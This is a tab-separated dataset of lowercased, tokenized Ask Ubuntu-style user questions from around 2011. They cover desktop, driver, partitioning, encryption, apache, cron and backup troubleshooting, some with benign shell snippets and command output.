56210	toggling between unity 3d and unity 2d	generally , i much prefer unity 3d over the 2d version , which is a bit broken on my machine . however , i frequently give presentations , and compiz does n't support multiple screens . i 've been forced to log out of 3d and into 2d every time i give a presentation , then back to 3d afterwards to get a more usable desktop . to avoid this inconvenience , i 've written a script to toggle between unity 2d and 3d without requiring a logout . unfortunately , when i run it from 2d , i wind up with 3d running , plus the 2d panel and launcher . both are on the screen simultaneously . i suspect that the 2d processes i 'm killing are getting re-spawned somehow . can someone help me debug my script ? # ! /bin/bash set -x unity_2d= '' unity-2d-places unity-2d-launcher unity-2d-panel unity-2d-spread '' start_2d ( ) { metacity -- replace & for i in $ unity_2d ; do `` $ i '' & done } stop_2d ( ) { killall $ unity_2d # the lack of quotes around $ unity_2d is deliberate. } start_3d ( ) { unity -- replace & } stop_3d ( ) { : # no-op for now } if ps -u `` $ user '' | grep -q [ m ] etacity ; then # unity 2d is currently running . stop_2d start_3d else # unity 3d is currently running . stop_3d start_2d fi edit my script works when i log in to 3d . it does n't work when i log in to 2d . so , it works for my most common use case , but the fact that it fails the other way around suggests to me that i 'm doing something wrong .
56211	where are the mysql innodb log files stored ?	i changed some settings for my innodb tables in mysql and encountered the problem that innodb was not shown in show engines output . as an answer i got the suggestion to delete the log files of innodb . where are these stored on ubuntu ?
56217	google earth caused an update error , can not completely remove	hi guys , i downloaded the google earth program from google 's site and installed it . but 2 days later i noticed that my update manager shows me this error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_earth_deb_dists_stable_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . ' i actually removed the program manually ( i deleted its folder via root options ) but nothing changed . i ca n't remove it via ubuntu software centre and google earth also did n't work after the error . so what do i do ?
56220	how to replace libreoffice with openoffice ?	to put it simply , i do not want libreoffice . how can i remove libreoffice and install openoffice . i have tried installing the .deb packages from the openoffice download but nothing visibly happens . the menus are n't updated and i ca n't browse for openoffice in the search . any help please ?
56225	is there an gui designer for python ?	is there a gui ide for programming python just like java has netbeans ? i wanted one where we could drag & drop test boxes & labels just as we do in swing components using netbeans or eclipse . or is there an add-on present in either netbeans or eclipse itself ?
56226	how do i get a notification bubble when i get new mail in evolution ?	i apologize if this has been asked before . i could not find the relevant post . i want to see a popup every time a mail comes through , right now , when i get a mail , i see a change in the color of the applet . previously when i was using 10.04 and 9.04 , i used to get a pop-up that would let me know that i had a mail .
56228	crontab not running	i have setup a crontab to run a shell script every minute . here 's my crontab file : * * * * * sh /var/www/stuff/public_html/recycle.sh this crontab fails to run at all , but if i run the shell script by itself it works perfect . can anyone explain why this might be happening ? other potentially useful info : os : ubuntu 10.04 user running the crontab : root
56231	what is a quick way to connect two or more pdfs together using the command-line ?	i have a few pdf files ( e.g. , small1.pdf , small2.pdf , small3.pdf ) that i 'd like to be able to join together to form one larger pdf ( e.g. , large.pdf ) . what is a good option for doing this on the command-line ?
56233	how do i open programs on a separate x screen ?	i 'm using 11.04 and an nvidia video card with an hdmi out . i 've got my tv hooked up to the hdmi out and have it set up to display a separate x screen . so far so good , i 've got my separate x screen over there . however , i can not for the life of me figure out how to get a program to open up over there , and not on the main display . if i use the variable `` display=:0.1 '' instead of opening the program on the tv , it just opens it on a second virtual desktop . any ideas ?
56235	broken icons , wifi , and login screen after upgrade	i am running the latest version of ubuntu and i ran almost all the new updates . my screen and icons went blank since last upgrade . my wifi is also not working . i have installed gnome 3 . the login screen also appears without any graphics . it 's looking like classic theme . i tried to login to both default ubuntu desktop and gnome 3 desktop . but dint work well . i have installed it under windows . how can i rollback the previous upgrades ? is there something like windows restore point in ubuntu ?
56237	how can i have one screen session per user and set it as the login shell ?	how can i set screen so it runs automatically any time a user logs in using a cli interface ? if there is already a screen session running for that user , i would like any new logins to attach to that screen session . it would be really nice if on attaching to the screen session a new window is created for each new login .
56238	ati 6xxx hybrid graphics w/open source drivers	you can turn on/off the dedicated graphics card via opensource drivers ( acpi_call , vgaswitcheroo , come to mind ) . however , there is no way to direct the display to the card . this card comes with pavilion dv6 . the proprietary drivers fail to boot xorg and the open source drivers return : vga_switcheroo : client 0 refused switch this message indicates that the card can not be switched during x. restarting xorg results in the laptop hanging . now that fixed mode is available as indicated below , you can switch on ati card permanently ( for the session ) in windows . helpful links : http : //linux-hybrid-graphics.blogspot.com/
56240	ubuntu , windows dual boot : windows will not start	i started with windows 7 on a toshiba laptop , and wanted to add ubuntu 11.04 in a dual boot configuration . i installed ubuntu using the standard install , and it seems grub has detected both windows and ubuntu . ubuntu works fine , but when i try to boot windows it will not load . it gets to the `` starting windows '' animation , which plays for about two seconds , and then reboots the computer . it seems that none of the safe mode , etc. , options do anything to help this problem . unfortunately , i have no idea how to even begin addressing this problem , since i ca n't even get into a command prompt in windows . it seems that the partitions are fine ( see below ) , but maybe there is something here i do n't know . if anyone has an idea on what i should try next , i 'd greatly appreciate any suggestions . thanks in advance for your assistance . *** @ sctoshlinux : ~ $ sudo fdisk -l [ sudo ] password for *** : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb7784a6c device boot start end blocks id system /dev/sda1 * 1 192 1536000 27 unknown /dev/sda2 192 23548 187606782 7 hpfs/ntfs /dev/sda3 37753 38914 9324544 17 hidden hpfs/ntfs /dev/sda4 23548 37753 114102273 5 extended /dev/sda5 23548 37264 110171136 83 linux /dev/sda6 37264 37753 3930112 82 linux swap / solaris partition table entries are not in disk order
56242	how to install debian package within ubuntu installation ?	i would like to install my project ( deb package ) with ubuntu installation . i have seen some of the deb packages in ubuntu source code , but i could n't find out from where and how they would be installed . moreover , i would like to know how ubuntu is installing default packages like openoffice , python , firefox etc . within it 's installation . any help would be appreciated . thanks !
56245	what are directories i should avoid when making a backup ?	there was this other question asking what directories can be excluded , based on their necessity . however , i think what i am asking is different enough to merit a separate question . i use the spideroak backup service , and they have some kind of system that keeps historical copies of saved files . my intention was to simply backup my whole home directory , which is somewhere around 70gb in size . however , it seems some directories contain cache files or other things that are updated or replaced frequently . because spideroak is saving every copy with every change , the space i am using on my spideroak account is rapidly increasing and in danger of maxing out . one solution is to white list only the directories i am sure i want to keep . however some directories are not so clear . my .mozilla directory , which contains my firefox settings ... i want to back up my bookmarks , but not things like the cache , and with all the sub-directories it 's hard to know where to draw the line . so , which directories should i definitely avoid , as they are just frequently updated cache and system files which will unnecessarily bloat my backup ?
56247	how to disable s.m.a.r.t . check for single drive ?	i have external raid array which do not support s.m.a.r.t . well and ubuntu annoys me constantly with random warning about drive being bad , which it is not . i would like to disable s.m.a.r.t . test just for this external drive . how i can do that ? ( raid enclosure have its own health tests , so i should be good without smart . )
56260	how to keep docky above all windows ?	i want to prevent docky from hiding but i also want it to dodge windows so docky is above everything . is there a way to do this whether within or out of the application ? i am using 11.04 classic desktop .
56262	what 's the command for ssh to find files which *.png and download them	i was connected my openssh , but what 's the command for ssh to find all files which are *.png and get them at the same time , recursively
56266	how to log memory and cpu usage of an application ?	similar to question how to log cpu load ? , i would like to log memory of a process . the process i want to log , is killed on a remote server , and i want to find out the cpu load and the memory usage just before it was killed . [ update ] both stefano palazzo 's neat little python script and michaĺ 's one line output values that are smaller than in top for cpu and mem . do you have an idea why ? output top : pid user pr ni virt res shr s % cpu % mem time+ command 2312 schxx 20 0 1241m 328m 58m s 100 0.3 11:56.68 matlab output stefano palazzo 's python script : python memlogger.py 2312 % cpu % mem 76.00 0.20 76.00 0.20
56267	what are the options for a very simple launcher ?	i 'm not overly impressed with the new unity launcher following my upgrade to 11.04 . ubuntu 10.04 with gnome was n't too bad once you 'd sorted out all your *.desktop files and i 'd been running with this for quite a while , but the number of problems i ( and others ) seem to be having with unity is considerable . and , while i may be happy spending the next few weeks trying to nut things out , my major client base ( i.e. , the wife ) is none too happy . what are the options for a very simple launcher , with the following specs ? small icon which will bring up a text menu . perhaps in the top area near the power button and network indicator and so forth . this icon should be always on top so i can get to it regardless of what 's on the screen . this icon should be on every workspace so that i can start programs from anywhere . a simple text configuration file that i can edit with vi , containing just the menu name and the command to run . the menu should come up fast . i do n't want to wait two seconds while it reads the configuration file just on the off chance i 've changed something ( it changes very rarely and , when it does , i 'll restart it myself ) . i do n't really want to go back to classic gnome since i will eventually figure out unity , so i do n't consider that an option . i 'm hoping there 's a simple solution to this problem that will suffice until my unity-fu is stronger .
56270	how can i spin down external hard drive ?	i want to spin down external hard drive from the terminal before unmounting . it is an sata drive connected through usb . running hdparm gives this ry @ g62x : /media $ hdparm -s10 937b2299-48ff-4a9c-8228-67ed4453e8fb/ 937b2299-48ff-4a9c-8228-67ed4453e8fb/ : setting standby to 10 ( 50 seconds ) hdio_drive_cmd ( setidle ) failed : inappropriate ioctl for device
56278	acpi 30k+ interrupts per second	my computer is currently doing something like 30k+ interrupts per second . this causes battery issues as well as the cpu being always stuck at the highest speed , making it very hot ( overheating.. 75c at idle ) powertop info : 99.4 % ( 32052.4 ) [ acpi ] < interrupt > 0.3 % ( 115.9 ) [ iwlagn ] < interrupt > just to clarify this started suddenly a couple of days ago . it did n't have this issue before ( though i had a tonne of headaches with linux on my computer in general.. )
56295	not able to stop apache processes	update : responding to the comment : check processes of apache : $ ps a | grep apache 3 grep : 3 : no such file or directory $ ps a | grep apache 4514 pts/0 s+ 0:00 grep -- color=auto apache $ ps a | grep apache2 4516 pts/0 s+ 0:00 grep -- color=auto apache2 checking apache error log $ tail /var/log/apache2/error.log [ sun aug 07 03:14:19 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.5 with suhosin-patch configured -- resuming normal operations [ mon aug 08 03:13:58 2011 ] [ notice ] graceful restart requested , doing restart [ mon aug 08 03:14:00 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.5 with suhosin-patch configured -- resuming normal operations [ mon aug 08 09:03:16 2011 ] [ notice ] caught sigterm , shutting down [ mon aug 08 09:05:47 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.5 with suhosin-patch configured -- resuming normal operations original : i have stopped apache , but why it still has the same number of processes running ? $ ps -a | grep apache 1663 ? 00:00:00 apache2 1667 ? 00:00:00 apache2 1668 ? 00:00:00 apache2 1669 ? 00:00:00 apache2 1670 ? 00:00:00 apache2 1671 ? 00:00:00 apache2 $ /etc/init.d/apache2 stop * stopping web server apache2 [ ok ] $ ps -a | grep apache 1663 ? 00:00:00 apache2 1667 ? 00:00:00 apache2 1668 ? 00:00:00 apache2 1669 ? 00:00:00 apache2 1670 ? 00:00:00 apache2 1671 ? 00:00:00 apache2 thanks !
56300	how do i download torrents ?	what is a torrent , and how do i use them on ubuntu ?
56306	how to disable unity keyboard shortcut for spread mode	i got a very weird problem . my developer laptop runs ubuntu 11.04 with unity . as a java developer i 'm using eclipse which whose shortcuts conflicts with the shortcuts of unity . the problem shortcuts is the one for the spread mode . it is set to super + w ( in my case windows + w ) what is ok for me so far . the real problem is that spread mode is also triggered when pressing shift + alt + up . unfortunately this shortcut is already used by eclipse but is somehow overwritten by unity . i 've already read a lot about how to disable and change the shortcuts for unity using the compizconfig settings manager . but i could n't manage to disable the shift + alt + up combo . any suggestions ?
56310	can not boot from live cd	i have a hcl notebook p38 pdc , the hard disk is completely blank . i tried installing ubuntu 11.04 as a .iso image from a cd but it did not boot . later i tried installing it from usb using unetbootin and also universal usb installer but both in vain . can someone please tell me what wrong am i doing or what else needs to be done . i am using a toshiba pen drive 4gb . i tried booting from the rescue mode but again had the same problem . would be great if someone helps me out asap . thank you ( for reading as well as for helping ) .
56313	how do i reset gnome to the defaults ?	i was playing around with some settings , and now i need to reset gnome to it 's defaults - how do i do that ?
56321	how to bind play/pause key to amarok ?	i have some play/pause , stop , next etc . keys on my dell vostro 1510 . these interact with banshee but do n't with amarok . how can i bind the latter to those keys ?
56326	how do i rename a directory via the command line ?	i have got the directory /home/user/foo and i want to rename it to /home/user/bar . how can i do this in a terminal ?
56328	how does one clear the rhythmbox music library database ?	how do i wipe the music database of rhythmbox ? i have imported lots of music into rhythmbox . now i want rhythmbox to forget everything that i 've imported .
56329	how do i create my own ubuntu version ?	i do n't like unity and i do n't like xubuntu or kubuntu that much , so i want to know how i can create my own ubuntu distro ! i want : a gui only a terminal installed ( no other unnecessary programs . ) i do n't want unity no browser , games , text editors or video players . i basically want a distro that is easy to set up the way you want it . so as many ppa should be added as default . is this at all possible ?
56332	minitube not playing nor downloading : is it an ubuntu-specific issue ?	the title says it all . i downloaded and installed minitube from repositories . the program 's unable to play or download any video . secretly though it did play one video the first time for the length of the video , but never afterwards . so what could be the issue ? is it related to the installation on ubuntu ? am i missing something ?
56336	is it possible to boot ubuntu on a truecrypt root partition ?	i 'm currently using luks device encryption to secure several machines running ubuntu . the security and integration is nice , but the performance is considerably less impressive than truecrypt , and i 'd like to test drive it in real life . the only problem is : i 've only seen truecrypt used for storage in an already-running os , i have n't seen it configured for / partition . has anyone done this or seen a tutorial i could check out on it ?
56339	how to create a soft or symbolic link ?	i am installing p4v in /opt , but /usr/bin is on my path . is it possible to create a soft or symbolic link for p4v from /opt to /usr/bin , so i can just type `` p4v '' since /usr/bin is in my path ?
56343	apt user guide and where can i find it ?	i am trying to get hold of the apt user guide to browse some of the more advanced options other than just apt-get etc . however whenever i type man apti get a message telling me manpage is not loaded . i know the command works as man sudo works fine . i 've tried sudo apt-get install apt-doc which tells me apt-doc is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded is there a local storage area for these manuals or someway i can load it ?
56344	how to move $ home to an encrypted partition ?	i have an unencrypted $ home ( i used the very basic installation with no further partitioning and no encryption at all ) . now i want to move my $ home to an encrypted partition on an external drive ( or move it there first and encrypt it later , does n't matter ) . what are the steps i have to do assuming i have an unpartitioned drive ? what i think is the main problem here for me : how do i mount the encrypted $ home on login or startup ? thanks in advance . edit : this blog post is about the ecryptfs-migrate-home command . but now there is the problem : will it work for a user 's home directory on an external drive mounted in /home ?
56348	how do i update ubuntu ?	how do i keep my ubuntu install up-to-date with the latest versions of software ?
56355	does dmcrypt/luks full disk encryption in kernel 3.0 have multi-core/multi-thread support ?	i 've read a lot about how fast truecrypt 7.0 is with it 's support for aes hardware acceleration and multi-core/multi-thread support . will dmcrypt/luks offer the same performance enhancing features on a full disk encryption setup on ubuntu 11.10 ?
56356	how to host a video conference with vlvc ?	i just found out that you can use vlc and vlvc to hold video conferences between 2-10 people , and that sounds amazing , hopefully removing the heavy lean on skype . can anyone tell me how to set up vlvc for video conferencing ? i ca n't seem to figure it out right now . i am sure it is easy , but i just seem to be stuck at the moment .
56357	toolbar and unity in games	i 've searched the internet a few times now and ca n't find a answer that helps me . when i play games such as dawn of war , the toolbar on the top half of my screen wo n't go in the background and neither will unity . so i 'm just hoping there 's a way around this . i 've just started using ubuntu ( 11.04 ) and on all other fronts i 'm very pleased with it . so i 'm hoping someone out there can help me . this little tweak to ubuntu would make it make it an all around fantastic experience for a newbie like me .
56367	can i create workspace-dependent command triggers ?	i 'm wondering if there 's a way to make one action have two different effects depending on the workspace it 's on . for example : if on workspace 1 , then the command to focus empathy 's chat list is used , but if on workspace 2 , then the command to open chrome is used . it would be linked to mousing over to the right edge of the screen in compiz . is this possible ?
56370	is there an rss feed that alerts subscribers of new/updated packages in the official repositories ?	i 'm a serial apt-getter ( running it often throughout the day ) , and i find it a great way to see where ubuntu developers are most active . that being said , an rss feed would probably be a smarter/safer way to keep up on what packages are being updated and when .
56379	is there an easy way to enable s3tc on intel graphics ?	s3tc is a patented graphics mechanism for compressing textures . it 's so widely patented that distributions ( ubuntu included ) does not ship it with its free drivers . closed-source drivers have this enabled because the companies ( amd/nvidia ) pay the patent royalties and assume the liability . but i 'm currently using an intel graphics chipset . specifically , the i915 . the drivers are completely free and open source . while i believe the hardware can handle s3tc , the drivers are those that shipped with ubuntu ( or through the updates ) so s3tc is turned off . from what i read ( fairly old posts ) turning s3tc on requires getting the source for mesa , patching in s3tc , reconfiguring it and then recompiling it all . in short , it sounds like a mess . is this still the case ? has somebody out there been nice and created a ppa with s3tc turned on ?
56380	what happened to the classic calendar applet ?	you know , the one that was in 10.04 and before , before unity . the new one is missing so many nice features such as showing the location on a map , showing the night on said map and having an overall much nicer presentation of the various locations entered . i am traveling a lot and also communicating to people from other parts of the globe and i miss that overall presentation which was very neat and easy to read . the new one is cramped and dull . and there is no automatic sorting of places depending of time . and i like seeing the time differences ( cst+6 ) so i can compute other times . also i now time and weather are two different things but having the local weather shown next to the location name was very nice . so my question is : is this the definitive look of the applet or are improvements planned for the following releases ? and a sub-question : why change something that works ?
56381	how do i find out if there is a better driver for my wifi card ?	i have a thinkpad w520 and ubuntu 11.04 . the wifi card is spotty . it works 80 percent of the time , but every few minutes it hangs and gets `` stuck '' for a few seconds before working again . so before i resort to replacing the wifi card , how can i see if there is a wifi driver update and how can i install it ? lscpi -v shows that my wifi is : 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device 8195 flags : bus master , fast devsel , latency 0 , irq 17 i/o ports at 5000 [ size=256 ] memory at f3a00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : rtl8192ce kernel modules : rtl8192ce
56384	xubuntu 11.10 alpha 3 release ?	as far as i know xubuntu 11.10 alpha 3 was not released due to some problems with the cd image , but will it be released later or is the beta1 going to be the next development release in 11.10 cycle ? i ca n't find any info about that ...
56386	how do i set for xts mode when installing ubuntu with guided setup for encrypted lvm ?	i read that cbc-essiv is used as the default mode for lvm entire disk encryption . i want to use xts mode instead . how do i select this when installing ?
56390	is it possible to block notifyosd for one application ?	is there any way to prevent notifyosd ( or xfce-notify ) from displaying notifications from one particular application ?
56391	how do i get `` ruby '' to do what `` ruby1.9.1 '' does ?	i want to start off by saying ... i really do n't need to be using 1.9.2 . i understand that you do n't ever , ever use python 3.2 , so if the common advice is that i should use 1.8 , i 'll do that . but do n't tell me to do that because it 's easier . whatever version i should be using , though , the question is still relevant : what 's a good way to make one command do another command ? ( i suppose i could write a c program to launch ruby1.9.1 , call the executable ruby , and put it in my bin , but this seems like less than a good idea )
56398	recommended dual-boot partitioning for eee pc 1015px-mu17	my younger brother has a brand-new asus eee pc netbook that we 'd like to dual-boot windows 7 starter ( already installed ) with ubuntu 10.04.3 lts . i created a 32-bit liveusb and booted it up after some fiddling with the bios , but i 'm not sure how the partitioning should proceed . here 's a screenshot of the netbook 's current unmodified partitions , via gparted : i have found this related question on askubuntu which talks about some of these partitions . i figure /dev/sda1 is where windows resides , and /dev/sda2 is the recovery partition . /dev/sda3 seems to be the windows d : \ drive , which afaik does n't contain anything important , and /dev/sda4 is , according to the other question , needed for the bios 's `` boot booster '' option giving faster boot times . i 'm still somewhat of a newbie when it comes to linux partitioning , but here 's my question : could i format /dev/sda3 and turn it into an extended partition , then manually set up an ext4 filesystem partition and a linux-swap partition in there using gparted , prior to continuing with a normal install through the installer ? would this be safe ( or smart ) to do , or would there be some better partitioning scheme you could recommend ? i do know that there can only be a maximum of 4 primary partitions on one disk , so something would have to go . as it stands now , the installer only allows me to wipe the whole disk to be used by ubuntu or specify partitions manually , which is a bit different from what i 'm used to .
56401	backing up files from specific folders in rsync	how can i specify specific files to include/exclude in grsync/rsync ? currently , i use different operations to backup files from only specified folders . i want to do it now in 1 pass . i think i should be looking at the include/exclude options ? suppose i have a folder structure like / /inc1 /inc1.1 / ... /inc2 / ... /exc1 files in root here ... i want to only backup files/folders from inc1 & inc2 how can i do it ?
56405	key icon in system tray ; what does it mean ?	i just had ubuntu installed on my laptop last week . last night i noticed an icon of a key pop up in my system tray for just a short period of time . when i clicked on it , it said something about setting permissions but it did n't take me anywhere . what is this ?
56408	restore home icon on ubuntu 11.04 launcher	after installing ubuntu 11.04 , i removed the home icon from the launcher by right clicking on the home icon and chosing the - keep in launcher option . then it disappeared . now i am wondering how do i restore it , because i think it was not a good idea and i need it now . can anyone help me on this ?
56413	limited number of downloads of ubuntu one music store purchases ?	one of the albums i just bought from ubuntu one music store wo n't synchronize to all of my computers : '' you have reached the download limit for this song . please purchase it again from the store . '' there was no previous warning that this could happen . other albums synchronize properly to all computers . is this intended ? can you add some kind of warning to such albums ?
56421	how do i set the values of a list key through gconftool-2 ?	i want to change the values of a gconf list key through the terminal , i 'm not sure how to do it though . gconftool-2 -- type list the/key/to/modify but then i do n't know how to put the values since it 's not just one . so , how do i set different values to a gconf list key ? .
56422	ubuntu free culture showcase tip line ?	i have had a look at the ubuntu free culture showcase wiki . it has lots of information about how to submit material . i have no talent whatsoever , however if i see something awesome/spectacular/beautiful , how do i tell the ubuntu free culture showcase about it ? in short how do i big up my favorite video/picture/music ?
56423	podcast subscription in banshee	i have successfully subscribed to the ubuntu uk podcast by giving the rss-link http : //feeds.feedburner.com/ubuntuukpodcastogg-high ? format=xml to banshee and it works fine . but the same does not work for the full circle podcast , i have given the rss-link http : //fullcirclemagazine.org/category/podcast/feed/atom/ to banshee , but the podcast is not added and banshee only responds with the following error message : parsing error updating http : //fullcirclemagazine.org/category/podcast/feed/atom/ any recommendations ? is the rss-feed used by the full circle podcast of a form not accepted by banshee ?
56424	any way to get a faster program start in unity ?	i like the look of unity and i also like to use keyboard shortcuts . however , my impression is that in ubuntu 11.04 it takes longer time for a program to start than compared to ubuntu 10.10 . for example , if i hold super and then press 1 then i expect the file manager to pop up almost immediately , but instead it takes a few seconds . not much , but irritating . the hardware should not be the problem since my computer was new and state of the art one year ago ( sony vaio with nvidia graphics driver ) . is there any way to get a faster program start in unity of ubuntu 11.04 ? or will this be taken care of in ubuntu 11.10 ? addition : my computer has a intel core i5 processor ( 2.4 ghz ) , 4 gb memory , and nvidia geforce gt 330m graphics card . in my opinion , it is fair to say that this was state of the art one year ago and it is still a powerful computer . ( the script `` /usr/lib/nux/unity_support_test -p '' gives a definitive yes that unity is supported . ) the computer runs a clean install of ubuntu 11.04 and i have not activated any extra fancy stuff . my question is if unity 3d in ubuntu 11.04 can be tweaked to run faster .
56425	installing trac with subversion	i am installing trac with subversion while installing i have error , i am following this link `` http : //trac.edgewall.org/wiki/ubuntu-11.04-subversion '' ... .when i give the database string it gives the following error , could anybody please help ... . ? ? database connection string [ sqlite : db/trac.db ] > mysql : //trac : yourpassword @ localhost/trac creating and initializing project initenv for '/var/tracprojects/yourproject ' failed . failed to create environment . [ errno 2 ] no such file or directory : '/var/tracprojects/yourproject' traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/dist-packages/trac-0.12-py2.7.egg/trac/admin/console.py '' , line 413 , in do_initenv options=options ) file `` /usr/local/lib/python2.7/dist-packages/trac-0.12-py2.7.egg/trac/env.py '' , line 221 , in __init__ self.create ( options ) file `` /usr/local/lib/python2.7/dist-packages/trac-0.12-py2.7.egg/trac/env.py '' , line 382 , in create os.mkdir ( self.path ) oserror : [ errno 2 ] no such file or directory : '/var/tracprojects/yourproject'
56427	external gpu system in linux ?	has anybody got any idea what would be needed to have a working external gpu system ( egpu ) under linux ? i 've just seen this post of a diy egpu system : http : //forum.tabletpcreview.com/hardware/40268-diy-egpu-tablet-pcs-experiences-benchmarks-setup-ect.html i found this mentioned which i think is also relevant : my system has switchable graphics . can i still do a egpu ? yes you can . setup 1.x 's ( video card- > hybrid graphics.dedicated=off ) allows the dedicated graphics component to be completely disabled on series-5 or older chipsets , freeing up 32-bit resources to host the desktop egpu . if your primary video card is a intel 4500mhd , hd or hd3000 then can even do a x1.opt nvidia setup .
56428	how to automount a gvfs file system on logon	i configured a remote folder in nautilus . i always need this remote folder , so i created a symbolic link to it in my home folder : ln -s ~/.gvfs/remote_folder ~/remote_folder . though , when i first boot the computer this folder is not mounted , and i have to access it through nautilus in order to have it available in ~/remote_folder . what should i do to have this folder mounted on log on ?
56432	how do i use xen hypervisor ?	i am interested in trying out xen ; what packages do i need to install ? how do i set up a domu instance ?
56434	ca n't ping from virtualbox ubuntu server -- nat connection	i set up an ubuntu server in virtual box following these and these instructions.my connection worked , also ssh . then , i signed up in dyndns.com , i configured the router , but in the port forward i changed the 2222 port to 80 because it couldnât forward from 2222.my port is open and accepting connections but i donât have any more connection from the server in the virtual box . from virtual box settings- > network- > port forwarding , i use : host ip :127.0.0.1 , host port :80 , guest port :22 , guest ip : its empty . i am not sure if i am using right the address in /etc/network/interfaces , i use 192.168.0.2 and also this address i use for the firewall rules in the router . also , in the server /etc/resolv.conf i put that address and in /etc/mysql/my.cnf . i can ping that address but nothing more . ( of course neither ssh works ) thank you
56443	how to increase the disk space of a vmware virtual disk ?	i have a vm running ubuntu , and i wish to increase its size from 20 to 40 gb . i powered off the vm and on the vmware side increased the allocated disk space . i did this by edit virtual machine settings - > hard disk - > utilities and so forth . it then warned me that i should increase the partition size within the guest vm . looking at the disk usage analyzer inside of ubuntu , it only currently sees the original 20 gb . how do i increase this to the 40 i allocated ?
56444	why is syncing my ipod extremely slow on ubuntu in comparison to windows ?	i 've tried both rhythmbox and banshee for syncing my ipod touch 3g . however it frustrates me that it took them so long to sync up all my songs ( ~1700 ) . it took around 3~4hours . curious to see how long it took in windows , i booted into my windows partition and tried to sync my ipod from scratch ( using mediamonkey , apparently itunes ca n't import my playlist properly ) again with the same amount of songs and to my surprise it only took ~30minutes , i tested by selecting a few songs to made sure it worked ( rhythmbox failed me once after i finished my sync , the file is there but not playable ) , and it did ! has anyone encountered similar problem and has a solution ? thank you .
56446	how do i install the ubuntu-restricted extras package ?	i would like to install the restricted extras package , which i did n't select during the install . how can i do that ? ubuntu-restricted-extras is a meta-package that installs : support for mp3 and unencrypted dvd playback microsoft truetype core fonts flash plugin codecs for common audio and video files
56449	how can i track down a bug that triggers on reboot ?	ubuntu 11.04 has a strange bug for me , and it has morphed with a recent update . in the past , when i 'd reboot into windows ( 7 , for gaming ) , the system would come up to the point where it should switch into full graphical mode , and then spontaneously reboot . when it came up again , it would continue to the login screen , and everything would be fine . if i shut the machine down , instead of rebooting , and then powered it back on with the power button , it would not do a reboot to get into windows the first time through . now , however , some package has been updated ( i 'm guessing the kernel ) , and things have changed . on reboot now -- whether by rebooting from within ubuntu or by shutting down and powering on again -- it reboots as it starts the bios . when it does finally come up , the bios tells me that there was a failed boot , and asks me to either enter the bios setup or continue . rebooting from windows does not cause this . rebooting from 10.10 did not cause this . i upgraded to 11.04 when it came out , found this bug , reverted to 10.10 , and it went away . i must conclude that my hardware is not at fault . i decided to try upgrading again -- figuring that this bug would have been fixed -- and find that the problem was not only not gone , but now is worse . the problem here is that there seems to be nothing i can do to troubleshoot this problem , so i have no idea where to file a bug report . does anyone know of a way to capture what the bios thinks is wrong ? maybe that could lead me back to whatever is going on in the linux kernel that 's leaving the bios in a strange state . i suspect it 's the fakeraid driver , as i have a stripe across which i have installed windows and ubuntu , and there have been a couple times where my /home partition has become corrupted and needed a fsck . that has never happened to me before . even if i just conclude it 's a fakeraid driver problem , do i submit it to ubuntu 's bug tracker , or the actual kernel 's tracker ? how would i know if ubuntu has been making patches against the mainline 's fakeraid driver ? i suppose i could try a vanilla kernel , but i 've always sucked at getting raw kernels compiled with everything i need . does someone run a ppa for generic kernels ? ( if so , i have n't been able to google it . )
56451	installer hangs/get stuck at `` where are you ? ''	i am trying to install ubuntu 11.04 alongside windows 7 . when i try to install this , the installer hangs at the screen where it asks `` where are you ? '' . this screen has a forward button . neither i can click on the forward button , nor can i type in the text box . but i can click and type in other places like the system settings window . i can also move the windows , etc . the progress bar shows `` copying files '' and remains like that forever . how can i get past this installation ?
56453	is it possible to run asp.net mvc3 ?	i 've seen somewhere that monodev is allowing that , but when i installed ubuntu and monodev i did find only mvc1 as an option for project to create . so maybe someone does know if it really is supporting asp.net mvc3 ( c # ) and if it is then how to set it up . also , what about db ? will i be able to run apps that require linq2sql model data-binder ?
56455	is there a mininal , command-line-only distribution of ubuntu or similar that runs within ms windows	i 'm looking for a distribution of linux ( hopefully similar to or based upon ubuntu ) which satisfies the following criteria : installs from and runs within windows ; does n't need to partition or dual-boot ; boots to a shell within windows . ideally i 'd like to click a shortcut on the windows desktop and have a linux shell appear in a command-prompt-style window . obviously performance is unimportant since i assume a filesystem-within-a-filesystem is going to be slow . i 've found distros like portableubuntu and pendrivelinux , but they all seem to be either out-of-date , minimally-supported , or too large . is there anything like that out there ?
56456	can not download files	using ubuntu one android with cyanogenmod-7 . whenever i click on a file to download the file the following error message pops up . error : ca n't create target directory . of course the file is never downloaded . the same occurs for folders . thanks for any help .
56458	force logitech c270 to use square resolution with skype ?	logitech c270 webcam , featuring widescreen , offers in skype first the normal width , and afterwards switches to widescreen modus . since skype seems to not offer wide screen , the images appear compressed from the sides , which means long faces on screen . since probabably skype ca n't be modified , maybe is a way to stop the widescreen ... does somebody know how ? greetings , toni
56461	my analog microphone does not work	i am using ubuntu 9.10 and my analog microphone does not work . i tried to use ekiga , but my voice is not heard . i used the audio recorder and tryed to record my own voice , but nothing is recorded . i started gnome-volume-control and disabled mute in the input part , and pushed the amplification to the maximum . i started alsa info and pasted the output here : http : //pastebin.com/ep6gbmre i tried to use alsmixer in the gnome terminal , but i ca n't use it because the controls are distorted . for any advice i would be grateful .
